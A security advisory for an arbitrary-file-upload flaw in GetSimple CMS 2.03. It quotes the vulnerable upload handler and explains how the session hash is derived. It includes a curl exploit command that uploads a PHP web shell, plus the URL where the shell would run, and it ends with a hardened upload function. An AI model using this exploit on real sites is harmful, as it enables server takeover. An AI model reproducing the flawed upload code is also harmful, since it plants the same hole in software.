source: https://www.securityfocus.com/bid/46427/info

GetSimple CMS is prone to an arbitrary-file-upload vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.

GetSimple CMS 2.03 is vulnerable; other versions may also be affected.

Bug Code:

getsimple/admin/upload-ajax.php

    // The only gate on the upload is the sessionHash request parameter.
    if ($_REQUEST['sessionHash'] === $SESSIONHASH) {
        if (!empty($_FILES)) {
            $tempFile = $_FILES['Filedata']['tmp_name'];
            // Client-supplied filename; nothing in this excerpt restricts its extension.
            $name = clean_img_name($_FILES['Filedata']['name']);
            $targetPath = GSDATAUPLOADPATH;
            $targetFile = str_replace('//', '/', $targetPath) . $name;
            // The file is moved into the uploads directory under that name.
            move_uploaded_file($tempFile, $targetFile);
        }
    }

----------------------------------------------------------------------

Generating SESSIONHASH: md5($salt . $sitename)

[XPL]

    curl -F "Filedata=@yourshell.txt;filename=shell.php" http://getsimple_localhost/admin/upload-ajax.php\?sessionHash\=HASH CREATO

Afterwards, enjoy your Bacon-Shell here:

    http://getsimple_localhost/data/uploads/shell.php
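A hardened counterpart to the upload-ajax.php excerpt above, as an added example that is not GetSimple's own code or its official fix. It assumes PHP 7.1+ with the fileinfo extension; ALLOWED_TYPES, issue_upload_token() and store_upload() are hypothetical names, while GSDATAUPLOADPATH and the Filedata/sessionHash fields come from the page.

```php
<?php
// Added example, not GetSimple code. ALLOWED_TYPES, issue_upload_token() and
// store_upload() are hypothetical names; GSDATAUPLOADPATH is the page's constant.

// Allow-list: extension => MIME type the content must actually have.
const ALLOWED_TYPES = [
    'jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg',
    'png' => 'image/png',  'gif'  => 'image/gif',
];

// Per-session random token, replacing the static md5($salt . $sitename).
function issue_upload_token(): string
{
    if (empty($_SESSION['upload_token'])) {
        $_SESSION['upload_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['upload_token'];
}

// Returns the stored path, or null when the request is rejected.
function store_upload(array $file, string $token, string $expected, string $dir): ?string
{
    if ($expected === '' || !hash_equals($expected, $token)) {
        return null;                       // constant-time token comparison
    }
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED_TYPES)) {
        return null;                       // shell.php is refused here
    }
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== ALLOWED_TYPES[$ext]) {
        return null;                       // content does not match the extension
    }
    // Server-chosen name: the client filename never reaches the filesystem.
    $target = rtrim($dir, '/') . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    return move_uploaded_file($file['tmp_name'], $target) ? $target : null;
}

// Call site, shaped like the request handled by upload-ajax.php.
if (PHP_SAPI !== 'cli' && isset($_FILES['Filedata'])) {
    session_start();
    $stored = store_upload($_FILES['Filedata'], (string)($_POST['sessionHash'] ?? ''),
                           (string)($_SESSION['upload_token'] ?? ''), GSDATAUPLOADPATH);
    http_response_code($stored === null ? 403 : 200);
}
```

Configuring the web server so that nothing under the uploads directory is executed as PHP is a separate layer that this code does not provide.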